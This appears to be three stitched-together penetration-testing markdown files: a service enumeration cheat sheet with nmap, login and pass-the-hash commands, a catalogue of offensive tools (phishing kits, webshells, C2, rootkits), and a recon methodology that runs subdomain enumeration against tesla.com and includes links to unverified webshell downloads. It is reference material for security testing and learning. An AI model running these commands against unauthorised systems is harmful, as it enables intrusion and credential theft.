> - Nmap Scripts: `nmap --script=ms-sql-info.nse -p 1433 <ip>`
> - Admin Login: `sqsh -S <ip> -U sa`
### Oracle TNS Listener - 1521-1529
> https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
### NFS - 2049
> https://book.hacktricks.xyz/pentesting/nfs-service-pentesting
>
> - List Mounts: `showmount -e <ip>`
> - Mount Filesystem: `mount <ip>:/ /<localdir>`
### ISCSI - 3260
> https://book.hacktricks.xyz/pentesting/3260-pentesting-iscsi
### SAPRouter - 3299
> https://book.hacktricks.xyz/pentesting/3299-pentesting-saprouter
### MySQL - 3306
> https://book.hacktricks.xyz/pentesting/pentesting-mysql
>
> - Nmap Scripts: `nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 <ip>`
> - Admin Login: `mysql --host=<ip> -u root -p`
### RDP - 3389
> https://book.hacktricks.xyz/pentesting/pentesting-rdp
>
> - Nmap scripts: `nmap --script=rdp-vuln-ms12-020.nse -p 3389 <ip>`
> - Connect: `rdesktop -u <username> -p <password> <ip>`
### epmd - 4369
> https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd
### mDNS - 5535 (UDP)
> https://book.hacktricks.xyz/pentesting/5353-udp-multicast-dns-mdns
### PostgreSQL - 5432/5433
> https://book.hacktricks.xyz/pentesting/pentesting-postgresql
### AMQP - 5671/5672
> https://book.hacktricks.xyz/pentesting/5671-5672-pentesting-amqp
### VNC - 5800/5801/5900/5901
> https://book.hacktricks.xyz/pentesting/pentesting-vnc
>
> - Nmap Scripts: `nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 <ip>`
### CouchDB - 5984/6984
> https://book.hacktricks.xyz/pentesting/5984-pentesting-couchdb
### WinRM - 5985
> https://book.hacktricks.xyz/pentesting/5985-5986-pentesting-winrm
>
> - Connect:
> - Password: `evil-winrm -i <ip> -u <username> -p <password>`
> - Hash: `evil-winrm -i <ip> -u <username> -H <hash>`
### X11 - 6000
> https://book.hacktricks.xyz/pentesting/6000-pentesting-x11
### Redis - 6379
> https://book.hacktricks.xyz/pentesting/6379-pentesting-redis
### AJP - 8009
> https://book.hacktricks.xyz/pentesting/8009-pentesting-apache-jserv-protocol-ajp
### Splunkd - 8089
> https://book.hacktricks.xyz/pentesting/8089-splunkd
### Cassandra - 9042/9160
> https://book.hacktricks.xyz/pentesting/cassandra
### Elastisearch - 9200
> https://book.hacktricks.xyz/pentesting/9200-pentesting-elasticsearch
### MongoDB - 27017/27018
> https://book.hacktricks.xyz/pentesting/27017-27018-mongodb
### Hadoop - 50030/50060/50075/50090
> https://book.hacktricks.xyz/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop
## Tools Cheatsheet
> - [Cheatsheet](https://compass-security.com/fileadmin/Research/White_Papers/2019-01_hacking-tools-cheat-sheet.pdf)
## OS
### Linux
> - [Checklist](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist)
> - [Methods](https://book.hacktricks.xyz/linux-unix/privilege-escalation)
> - [ENV Variables](https://book.hacktricks.xyz/linux-unix/linux-environment-variables)
### Windows
> - [Checklist](https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation)
> - [Methods](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation)
> - [AD](https://book.hacktricks.xyz/windows/active-directory-methodology)
> - [NTLM](https://book.hacktricks.xyz/windows/ntlm)
> - [Creds](https://book.hacktricks.xyz/windows/stealing-credentials)
> - [Auth](https://book.hacktricks.xyz/windows/authentication-credentials-uac-and-efs)
> - [CMD](https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters)
> - [PowerShell](https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters)
> - [AV bypass](https://book.hacktricks.xyz/windows/av-bypass)
|
# Pentest Tools
![](logo.png)
The tools listed below are commonly used in penetration testing, and the tool catalog is referenced from Kali Tools, most of which are open source software. The project long-term supplementary update QAQ
## TODO
* [x] Directory
* [ ] Browser bookmarks
* [ ] Install Scripts
* [ ] Documentation
## List
* [Information Gathering](#information-gathering)
* [Subdomain](#Subdomain)
* [Google Hack](#Google-Hacking)
* [Github](#Github)
* [SVN](#SVN)
* [Port-Scan](#port-scan)
* [OSINT](#OSINT)
* [Phishing](#Phishing)
* [Vulnerability Analysis](#vulnerability-analysis)
* [Fuzzing](#Fuzzing)
* [Vulnerability Scan](#vulnerability-scan)
* [Web Applications](#web-applications)
* [CMS & Framwork Identification](#cms--framwork-identification)
* [Web Applications Proxies](#web-applications-proxies)
* [Web Crawlers & Directory Brute Force](#web-crawlers--directory-brute-force)
* [Docker Scanners](#Docker-Scanners)
* [Database Assessment](#database-assessment)
* [Password Attacks](#password-attacks)
* [Wireless Attacks](#Wireless-Attacks)
* [Wireless Tools](#Wireless-Tools)
* [Reverse Engineering](#Reverse-Engineering)
* [Exploitation Tools](#exploitation-tools)
* [Vulnerability Search](#vulnerability-search)
* [Cross-site Scripting](#cross-site-scriptingxss)
* [Sql Injection](d#sql-injection)
* [Command Injection](#command-injection)
* [File Include](#file-include)
* [File Upload vulnerability](#file-upload-vulnerability)
* [XML External Entity Attack(XXE)](#xml-external-entity-attackxxe)
* [Cross-site request forgery (CSRF)](#Cross-site-request-forgery-(CSRF))
* [Exploit Framework](#exploit-framework)
* [Machine Learning](#Machine-Learning)
* [Automate](#Automate)
* [Sniffing & Spoofng](#Sniffing-&-Spoofng)
* [Maintaining Access](#maintaining-access)
* [Shell](#Shell)
* [Web Shell](#web-shell)
* [Privilege Escalation Auxiliary](#privilege-escalation-auxiliary)
* [C2](#C2)
* [Golang Sec Tools](#Golang-Sec-Tools)
* [Reporting Tools](#reporting-tools)
* [Social Engineering](#Social-Engineering)
* [System Services](#System-Services)
* [Code Audit](#code-audit)
* [Port Forwarding & Proxies](#port-forwarding--proxies)
* [DevSecOps](#DevSecOps)
* [RootKit](#RootKit)
* [Cyber Range](#Cyber-Range)
* [Vulnerability application](#vulnerability-application)
* [Simulation range](#Simulation-range)
* [CTF challenges](#CTF-challenges)
### Information Gathering
#### Domain Name
* [whois](https://docs.microsoft.com/en-us/sysinternals/downloads/whois) - Windows Whois performs the registration record for the domain name or IP address that you specify.
#### Subdomain
* [subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) - A fast sub domain brute tool for pentesters
* [ksubdomain](https://github.com/boy-hack/ksubdomain) - Subdomain enumeration tool, asynchronous dns packets, use pcap to scan 1600,000 subdomains in 1 second
* [Sublist3r](https://github.com/aboul3la/Sublist3r) - Fast subdomains enumeration tool for penetration testers
* [OneForAll](https://github.com/shmilylty/OneForAll) - 👊 OneForAll is a powerful subdomain integration tool
* [LayerDomainFinder](https://github.com/euphrat1ca/LayerDomainFinder) - a subdomains enumeration tool by Layer
#### Google Hacking
* [GHDB](https://www.exploit-db.com/google-hacking-database/) - Google Hack Database
* [SearchDiggity](http://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/) - SearchDiggity 3.1 is the primary attack tool of the Google Hacking Diggity Project
* [Katana](https://github.com/adnane-X-tebbaa/Katana) - A Python Tool For google Hacking
* [uDork](https://github.com/m3n0sd0n4ld/uDork) - uDork is a script written in Bash Scripting that uses advanced Google search techniques to obtain sensitive information in files or directories, find IoT devices, detect versions of web applications, and so on.
* [Pagodo](https://github.com/opsdisk/pagodo) - pagodo (Passive Google Dork) - Automate Google Hacking Database scraping and searching .
#### Github
* [GitHacker](https://github.com/WangYihang/GitHacker) - 🕷️ A Git source leak exploit tool that restores the entire Git repository, including data from stash, for white-box auditing and analysis of developers' mind.
* [GitGraber](https://github.com/hisxo/gitGraber) - gitGraber is a tool developed in Python3 to monitor GitHub to search and find sensitive data in real time for different online services.
* [GitMiner](https://github.com/UnkL4b/GitMiner) - Tool for advanced mining for content on Github.
* [Gitrob](https://github.com/michenriksen/gitrob) - Reconnaissance tool for GitHub organizations.
#### SVN
* [svnExploit](https://github.com/admintony/svnExploit) - Support for SVN source code disclosure of full version and Dump it.
* [SvnHack](https://github.com/callmefeifei/SvnHack) - SvnHack is a SVN folder disclosure exploit.
#### Port Scan
* [Nmap | Zenmap](https://nmap.org/) - Free and open source utility for network discovery and security auditing
* [Masscan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously
* [Ports](https://github.com/nixawk/pentest-wiki/blob/master/3.Exploitation-Tools/Network-Exploitation/ports_number.md) - Common service ports and exploitations
* [Goby](https://gobies.org/) - Attack surface mapping
* [Goscan](https://github.com/marco-lancini/goscan) - Interactive Network Scanner
* [NimScan](https://github.com/elddy/NimScan) - 🚀 Fast Port Scanner 🚀
* [RustScan](https://github.com/RustScan/RustScan) - 🤖 The Modern Port Scanner 🤖
* [TXPortMap](https://github.com/4dogs-cn/TXPortMap) - Port Scanner & Banner Identify From TianXiang
* [Scaninfo](https://github.com/redtoolskobe/scaninfo) - fast scan for redtools
#### OSINT
* [theHarvester](https://github.com/laramies/theHarvester)- E-mails, subdomains and names Harvester - OSINT
* [SpiderFoot](https://github.com/smicallef/spiderfoot) - SpiderFoot automates OSINT for threat intelligence and mapping your attack surface.
* [FOCA](https://github.com/ElevenPaths/FOCA) - Tool to find metadata and hidden information in the documents.
* [Amass](https://github.com/OWASP/Amass) - In-depth Attack Surface Mapping and Asset Discovery
* [Censys-subdomain-finder](https://github.com/christophetd/censys-subdomain-finder) - Perform subdomain enumeration using the certificate transparency logs from Censys.
* [EmailHarvester](https://github.com/maldevel/EmailHarvester) - Email addresses harvester
* [Finalrecon](https://github.com/thewhiteh4t/FinalRecon) - The Last Web Recon Tool You'll Need.
* [LittleBrother](https://github.com/lulz3xploit/LittleBrother) - Information gathering (OSINT) on a person (EU)
* [Octosuite](https://github.com/rly0nheart/octosuite) - Advanced Github OSINT Framework
* [SiteScan](https://github.com/kracer127/SiteScan) - AllinOne Information Gathering Tools
### Phishing
* [gophish](https://github.com/gophish/gophish) - Open-Source Phishing Toolkit
* [AdvPhishing](https://github.com/Ignitetch/AdvPhishing) - This is Advance Phishing Tool ! OTP PHISHING
* [SocialFish](https://github.com/UndeadSec/SocialFish) - Educational Phishing Tool & Information Collector
* [Zphisher](https://github.com/htr-tech/zphisher) - An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !
* [Nexphisher](https://github.com/htr-tech/nexphisher) - Advanced Phishing tool for Linux & Termux
### Vulnerability Analysis
#### Fuzzing
#### Vulnerability Scanner
* [Struts-Scan](https://github.com/Lucifer1993/struts-scan) - Struts2 vulnerability detection and utilization tools
* [Nikto](https://github.com/sullo/nikto) - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items
* [W3af](https://github.com/andresriancho/w3af/) - Web application attack and audit framework, the open source web vulnerability scanner
* [Openvas](http://www.openvas.org/) - The world's most advanced Open Source vulnerability scanner and manager
* [Openvas Docker](https://github.com/mikesplain/openvas-docker)
* [Archery](https://github.com/archerysec/archerysec) - Open Source Vulnerability Assessment and Management helps developers and pentesters to perform scans and manage vulnerabilities
* [Taipan](https://github.com/enkomio/Taipan) - Web application vulnerability scanner
* [Arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework
* [Nuclei](https://github.com/projectdiscovery/nuclei) - Fast and customizable vulnerability scanner based on simple YAML based DSL.
* [Xray](https://github.com/chaitin/xray) - A passive-vulnerability-scanner Tool.
* [SiteScan](https://github.com/kracer127/SiteScan) -
### Web Applications
#### CMS & Framwork Identification
* [AngelSword](https://github.com/Lucifer1993/AngelSword) - CMS vulnerability detection framework
* [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Next generation web scanner
* [Wappalyzer](https://github.com/AliasIO/Wappalyzer) - Cross-platform utility that uncovers the technologies used on websites
* [Whatruns](https://www.whatruns.com/) - A free browser extension that helps you identify technologies used on any website at the click of a button (Just for chrome)
* [WhatCMS](https://github.com/HA71/WhatCMS) - CMS Detection and Exploit Kit based on Whatcms.org API
* [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs
* [EHole](https://github.com/EdgeSecurityTeam/EHole) - CMS Detection for RedTeam
CMS Detection
> Online Tools
* [Yunsee](http://www.yunsee.cn/finger.html) - Online website for to find the CMS footprint
* [Bugscaner](http://whatweb.bugscaner.com/look/) - A simple online fingerprint identification system that supports hundreds of cms source code recognition
* [WhatCMS online](https://whatcms.org/) - CMS Detection and Exploit Kit website Whatcms.org
* [TideFinger](http://finger.tidesec.com/) - Fingerprinter Tool from TideSec Team
#### Web Applications Proxies
* [Burpsuite](https://portswigger.net/) - Burpsuite is a graphical tool for testing Web application security
* [ZAP](https://github.com/zaproxy/zaproxy) One of the world’s most popular free security tools
* [Mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
* [Broxy](https://github.com/rhaidiz/broxy) - An HTTP/HTTPS intercept proxy written in Go.
#### web browser extension
* [Hack-Tools](https://github.com/LasCC/Hack-Tools) - The all-in-one Red Team extension for Web Pentester 🛠
#### Web Crawlers & Directory Brute Force
* [Dirbrute](https://github.com/Xyntax/DirBrute) - Multi-thread WEB directory blasting tool (with dics inside)
* [Dirbuster](https://sourceforge.net/projects/dirbuster/) - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers
#### Docker Scanners
* [Fuxi-Scanner](https://github.com/jeffzh3ng/Fuxi-Scanner) - open source network security vulnerability scanner, it comes with multiple functions.
* [Xunfeng](https://github.com/ysrc/xunfeng) - The patrol is a rapid emergency response and cruise scanning system for enterprise intranets
* [WebMap](https://github.com/KHPROG55/WebMap) - Nmap Web Dashboard and Reporting
### Database Assessment
### Password Attacks
* [Hydra](https://github.com/vanhauser-thc/thc-hydra) - Hydra is a parallelized login cracker which supports numerous protocols to attack
* [Medusa](http://foofus.net/goons/jmk/medusa/medusa.html) - Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer
* [Sparta](http://sparta.secforce.com/): [Document](./密码攻击/Sparta(斯巴达)/Readme.md) - Network Infrastructure Penetration Testing Tool
* [Hashcat](https://github.com/hashcat/hashcat) - World's fastest and most advanced password recovery utility
* [Patator](https://github.com/lanjelot/patator) - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
* [HackBrowserDat](https://github.com/moonD4rk/HackBrowserData) - Decrypt passwords/cookies/history/bookmarks from the browser
### Wireless Attacks
#### Wireless Tools
* [Fern Wifi cracker](https://github.com/savio-code/fern-wifi-cracker) - Fern-Wifi-Cracker is designed to be used in testing and discovering flaws in ones own network with the aim of fixing the flaws detected
### Reverse Engineering
* [Ollydbg](http://www.ollydbg.de/) - OllyDbg is a 32-bit assembler level analysing debugger for Microsoft Windows
### Exploitation Tools
#### Vulnerability Search
* [SPLOITUS](https://sploitus.com) - Sploitus is а convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities
* [SearchSploit](https://github.com/offensive-security/exploitdb) - The official Exploit Database repository
* [Getsploit](https://github.com/vulnersCom/getsploit) - Command line utility for searching and downloading exploits
#### Cross-site Scripting(XSS)
* [BeeF](https://github.com/beefproject/beef) - The Browser Exploitation Framework Project
* [BlueLotus_XSSReceiver](https://github.com/firesunCN/BlueLotus_XSSReceiver) - XSS Receiver platform without SQL
* [xssor2](https://github.com/evilcos/xssor2) - XSS'OR - Hack with JavaScript.
* [Xsser-Varbaek](https://github.com/Varbaek/xsser) - From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017 + Extras
* [Xsser-Epsylon](https://github.com/epsylon/xsser) - Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.
* [Xenotix](https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework) - An advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework
#### Sql Injection
* [Sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
* [Sqlmate](https://github.com/s0md3v/sqlmate) - A friend of SQLmap which will do what you always expected from SQLmap
* [SQLiScanner](https://github.com/0xbug/SQLiScanner) - Automatic SQL injection with Charles and sqlmap api
#### Command Injection
* [Commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool
#### File Include
* [LFIsuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
* [Kadimus](https://github.com/P0cL4bs/Kadimus) - Kadimus is a tool to check sites to lfi vulnerability , and also exploit it
* [Shellfire](https://github.com/unix-ninja/shellfire) - Exploitation shell for exploiting LFI, RFI, and command injection vulnerabilities
* [LFIter2](https://github.com/3mrgnc3/LFIter2) - LFIter2 Local File Include (LFI) Tool - Auto File Extractor & Username Bruteforcer
* [FDsploit](https://github.com/chrispetrou/FDsploit) - File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.
#### File Upload vulnerability
* [Fuxploider](https://github.com/almandin/fuxploider) - File upload vulnerability scanner and exploitation tool
#### XML External Entity Attack(XXE)
* [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
* [Oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes
#### Cross-site request forgery (CSRF)
* [Deemon](https://github.com/tgianko/deemon/) - Deemon is a tool to detect CSRF in web application
#### Exploit Framework
* [POC-T](https://github.com/Xyntax/POC-T) - Pentest Over Concurrent Toolkit
* [Pocsuite](https://github.com/knownsec/Pocsuite) - Pocsuite is an open-sourced remote vulnerability testing framework developed by the Knownsec Security Team
* [Metasploit](https://github.com/rapid7/metasploit-framework) - The world’s most used penetration testing framework
* [Venom](https://github.com/r00t-3xp10it/venom) - Shellcode generator/compiler/handler (metasploit)
* [Empire](https://github.com/EmpireProject/Empire) - Empire is a PowerShell and Python post-exploitation agent
* [Koadic](https://github.com/zerosum0x0/koadic) - Koadic C3 COM Command & Control - JScript RAT
* [Viper](https://github.com/FunnyWolf/Viper) - metasploit-framework UI manager Tools
* [MSFvenom-gui](https://github.com/ssooking/msfvenom-gui) - gui tool to create normal payload by msfvenom
#### Machine Learning
* [DeepExploit](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit) - Fully automatic penetration test tool using Machine Learning
* [GyoiThon](https://github.com/gyoisamurai/GyoiThon) - GyoiThon is a growing penetration test tool using Machine Learning
* [Generator](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Generator) - Fully automatically generate numerous injection codes for web application assessment
#### Automate
* [AutoSploit](https://github.com/NullArray/AutoSploit) - Automated Mass Exploiter
* [WinPwn](https://github.com/SecureThisShit/WinPwn) - Automation for internal Windows Penetrationtest / AD-Security
### Sniffing & Spoofng
* [WireShark](https://github.com/wireshark/wireshark) - Wireshark is a network traffic analyzer, or "sniffer", for Unix and Unix-like operating systems.
* [Cain & able](http://www.oxid.it/cain.html) - Cain & Abel is a password recovery tool for Microsoft Operating Systems.
### Maintaining Access
#### Shell
* [Goshell](https://github.com/eze-kiel/goshell) - Generate reverse shells in command line with Go !
* [Print-My-Shell](https://github.com/sameera-madushan/Print-My-Shell) - Python script wrote to automate the process of generating various reverse shells.
* [Girsh](https://github.com/nodauf/Girsh) - Automatically spawn a reverse shell fully interactive for Linux or Windows victim
* [Blueshell](https://github.com/whitehatnote/BlueShell) - Generate a reverse shells for RedTeam
* [Clink](http://mridgers.github.io/clink/) - Powerful Bash-style command line editing for cmd.exe
* [Natpass](https://github.com/jkstack/natpass) - A new RAT Tools, Support Web VNC and Webshell
#### Web Shell
* [Novahot](https://github.com/chrisallenlane/novahot) - A webshell framework for penetration testers.
* [Awsome-Webshells](https://github.com/abhinavprasad47/Awsome-Webshells) - Collection of reverse shells
##### PHP
* [B374K](https://github.com/b374k/b374k) - PHP Webshell with handy features
* [DAws](https://github.com/dotcppfile/DAws) - Advanced Web Shell
* [Weevely3](https://github.com/epinna/weevely3) - Weaponized web shell
##### Chopper kind Webshell
* Chopper
> Tips: The tool comes from the network, no backdoor verification, please choose it on yourself......
> Link: https://pan.baidu.com/s/1VnXkoQU-srSllG6JaY0nTA Password: v71d
* [AntSword](https://github.com/AntSwordProject/antSword) : [Document](https://doc.u0u.us/zh-hans/index.html) - AntSword is a cross-platform website management toolkit
* [CKnife](https://github.com/Chora10/Cknife) - The cross platform webshell tool in java
> Tips: The tool comes from the network, no backdoor verification, please choose it on yourself......
> Link: https://pan.baidu.com/s/1QZrnWU7DUuJhiXl7u1kELw Password: hjrh
* [Altman](https://github.com/keepwn/Altman) - The cross platform webshell tool in .NET
* [Behinder](https://github.com/rebeyond/Behinder) - dynamic binary encryption webshell management client
* [Godzilla](https://github.com/BeichenDream/Godzilla) - a Java tool to encrypt network traffic
#### Privilege Escalation Auxiliary
* [windows-exploit-suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target
* [Windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) - windows-kernel-exploits
* [linux-exploit-suggester-2](https://github.com/jondonas/linux-exploit-suggester-2) - Next-Generation Linux Kernel Exploit Suggester
* [Linux-kernel-exploits](https://github.com/SecWiki/linux-kernel-exploits) - linux-kernel-exploits Linux
* [BeRoot](https://github.com/AlessandroZ/BeRoot) - Privilege Escalation Project - Windows / Linux / Mac
* [PE-Linux](https://github.com/WazeHell/PE-Linux) - Linux Privilege Escalation Tool By WazeHell
* [Portia](https://github.com/SpiderLabs/portia) - Portia aims to automate a number of techniques commonly performed on internal network penetration tests after a low privileged account has been compromised.
* [PEASS-ng](https://github.com/carlospolop/PEASS-ng) - PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
#### C2
* [DeimosC2](https://github.com/DeimosC2/DeimosC2) - DeimosC2 is a Golang command and control framework for post-exploitation.
* [Sliver](https://github.com/BishopFox/sliver) - Implant framework
* [PHPSploit](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner 😈
* [Shad0w](https://github.com/bats3c/shad0w) - A post exploitation framework designed to operate covertly on heavily monitored environments (Win8、Win10)
* [Covenant](https://github.com/cobbr/Covenant) - Covenant is a collaborative .NET C2 framework for red teamers.
* [Emp3r0r](https://github.com/jm33-m0/emp3r0r) - linux post-exploitation framework made by linux user
### Golang Sec Tools
> Tips: Golang is a excellent cross platform language for security.
* [Naabu](https://github.com/projectdiscovery/naabu) - A fast port scanner written in go with focus on reliability and simplicity.
* [ServerScan](https://github.com/Adminisme/ServerScan) - A high concurrency network scanning and service detection tool developed by golang.
### Reporting & Collaboration
* [Vulnreport](https://github.com/salesforce/vulnreport) - Open-source pentesting management and automation platform by Salesforce Product Security
* [Pentest-Collaboration-Framework](https://gitlab.com/invuls/pentest-projects/pcf) - Opensource, cross-platform and portable toolkit for automating routine processes when carrying out various works for testing!
### Social Engineering
### System Services
### Code Audit
* [Cloc](https://github.com/AlDanial/cloc) - cloc counts blank lines, comment lines, and physical lines of source code in many programming languages
* [Cobra](https://github.com/WhaleShark-Team/cobra) - Source Code Security Audit
* [Cobra-W](https://github.com/LoRexxar/Cobra-W) - Cobra for white hat
* [Graudit](https://github.com/wireghoul/graudit) - Grep rough audit - source code auditing tool
* [Rips](https://github.com/ripsscanner/rips) - A static source code analyser for vulnerabilities in PHP scripts
### Port Forwarding & Proxies
* [EarthWorm](https://github.com/rootkiter/EarthWorm) - Tool for tunnel
* [Termite](https://github.com/rootkiter/Termite/) - Tool for tunnel (Version 2)
* [Frp](https://github.com/fatedier/frp) - A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet
* [Nps](https://github.com/ehang-io/nps/) - A lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal.
* [Goproxy](https://github.com/snail007/goproxy) - A high-performance, full-featured, cross platform proxy server
* [ReGeorg](https://github.com/sensepost/reGeorg) - The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn
* [Venom](https://github.com/Dliv3/Venom) - A Multi-hop Proxy for Penetration Testers
* [Stowaway](https://github.com/ph4ntonn/Stowaway) - 👻 Stowaway -- Multi-hop Proxy Tool for pentesters
* [rport](https://github.com/cloudradar-monitoring/rport) - Manage remote systems with ease.
### DevSecOps
### RootKit
* [Beurk](https://github.com/unix-thrust/beurk) - BEURK Experimental Unix RootKit
* [Bedevil](https://github.com/naworkcaj/bdvl) - LD_PRELOAD Linux rootkit (x86 & ARM)
### Audit Tools
* [DevAudit](https://github.com/OSSIndex/DevAudit) - Open-source, cross-platform, multi-purpose security auditing tool
### Cyber Range
#### Vulnerability application
* [DVWA](https://github.com/ethicalhack3r/DVWA) - Damn Vulnerable Web Application (DVWA)
* [WebGoat](https://github.com/WebGoat/WebGoat) - WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons
* [DSVW](https://github.com/stamparm/DSVW) - DSVW is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes
* [DVWS](https://github.com/snoopysecurity/dvws) - Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities
* [XVWA](https://github.com/s4n7h0/xvwa) - XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security
* [BWAPP](http://www.mmebvba.com/sites/bwapp/index.htm) - A buggy web application whit more than 100 vulnerabilities
* [Sqli-lab](https://github.com/Audi-1/sqli-labs) - SQLI labs to test error based, Blind boolean based, Time based
* [HackMe-SQL-Injection-Challenges](https://github.com/breakthenet/HackMe-SQL-Injection-Challenges) - Hack your friend's online MMORPG game - specific focus, sql injection opportunities
* [XSS-labs](https://github.com/paralax/xss-labs) - Small set of scripts to practice exploit XSS and CSRF vulnerabilities
* [SSRF-lab](https://github.com/m6a-UdS/ssrf-lab) - Lab for exploring SSRF vulnerabilities
* [SSRF_Vulnerable_Lab](https://github.com/incredibleindishell/SSRF_Vulnerable_Lab) - This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack
* [LFI-labs](https://github.com/paralax/lfi-labs) - Small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns
* [Commix-testbed](https://github.com/commixproject/commix-testbed) - A collection of web pages, vulnerable to command injection flaws
* [File-Upload-Lab](https://github.com/LunaM00n/File-Upload-Lab) - Damn Vulnerable File Upload V 1.1
* [Upload-labs](https://github.com/c0ny1/upload-labs) - A summary of all types of uploading vulnerabilities for you
* [XXE-Lab](https://github.com/c0ny1/xxe-lab) - A XXE vulnerability Demo containing language versions such as PHP, Java, python, C#, etc
#### Simulation Range
* [Fopnp](https://github.com/brandon-rhodes/fopnp/tree/m/playground) - A Network Playground for
《Foundations of Python Network Programming》
* [CyberRange](https://github.com/secdevops-cuse/CyberRange) - The Open-Source AWS Cyber Range
#### CTF challenges
* [Vulnhub](https://www.vulnhub.com/) - VulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration
* [TryHackMe](https://tryhackme.com/) - TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
* [Hackthebox](https://www.hackthebox.com/) - Hack The Box is a massive, online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world to level up their hacking skills.
* [Root Me](https://www.root-me.org/) - Root Me allows everyone to test and improve their knowledge in computer security and hacking.
|
# welcome to my methodolgy I collected All what I have learnt from amazing hackers , Tomnomnom , Jason Haddix , Uncle Rat , NahamSec and
More Amazing People hackers ,
I usually like to start with a very big inscope attack surface and then norrow it down ::
# mind map threat
```
note taking
https://obsidian.md/download
https://github.com/TheCashiers/Obsidian.Docs/blob/master/docs/basic/install-guide-linux.rst
online service
http://ci-www.threatcrowd.org/
```
Dynamic Socks Port on local machine to bypass firewall and Httpproxy
```
git clone https://github.com/bryanpkc/corkscrew
proxytunnel is an alternative
cat Readme.md
```
# Depending on the target I First open a checklist my Go to is Hacktricks, really amazing source for Checklist to make sure I don't miss anything
```
https://book.hacktricks.xyz/welcome/readme
```
## first of all we want to stay ANONYMOUS and ecrypt our communication
## tor
```
https://github.com/Und3rf10w/kali-anonsurf
```
## Usage:
### anonsurf {start|stop|restart|change|status}
```
cloud flare wrap
https://1.1.1.1
```
#Recon
## find subdomains and probe them for alive ones
sublist3r -v -d tesla.com -t 10 -e "baidu,yahoo,google,bing,ask,netcraft,dnsdumpster,threatcrowd,ssl,passivedns"
## also awe ranges
## https://kaeferjaeger.gay/
## sni-ip-ranges
## Write simple bash script and check for the entire cloud infrastructure
```bash
#!/bin/bash
#use other subdomanizers like amass , sublis3r etc ...
subfinder -d example.com > subs.txs
#making sure I only test the alive ones
cat subs.txt | httprobe > subs-alive.txt
```
# Find IP space and ASN
https://bgp.he.net/
## check ASNS
## Find Prefixes v4
## clean ASN results to filter only IP
## Reverse ASN lookup to find
```
https://hackertarget.com/as-ip-lookup/
to find the targets whole subnet
x.x.x.x/24
```
# CrunchBase
## Check for Aquistions
# occrp aleph
## Datasets
### SEC Corp watch , or check for assets
# Shoan //For Paid Shodan Karam Is Awesome
## org:Orginasation
### check for dana-na VPN LOGINS $$
### Also Shodan gives IPv6 which are almost impossible to find manually
### we get IP information
### SSL Information
### Port information
# https://builtwith.com/relationships/target.com
```
grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\/[0-9]{1,2}\b'
```
# NMAP and MassScan Look for only intersting Ports !!!!!
here is an amazing cheatsheet :
<a>
https://www.stationx.net/nmap-cheat-sheet/
</a>
## amazing tutorial
https://www.youtube.com/watch?v=wlqUO09J-nw
## route to verify I am on the network
```
find how many IP's Are UP
nmap -PR -sn x.x.x.x/x //internal layer 2 scan ping scan
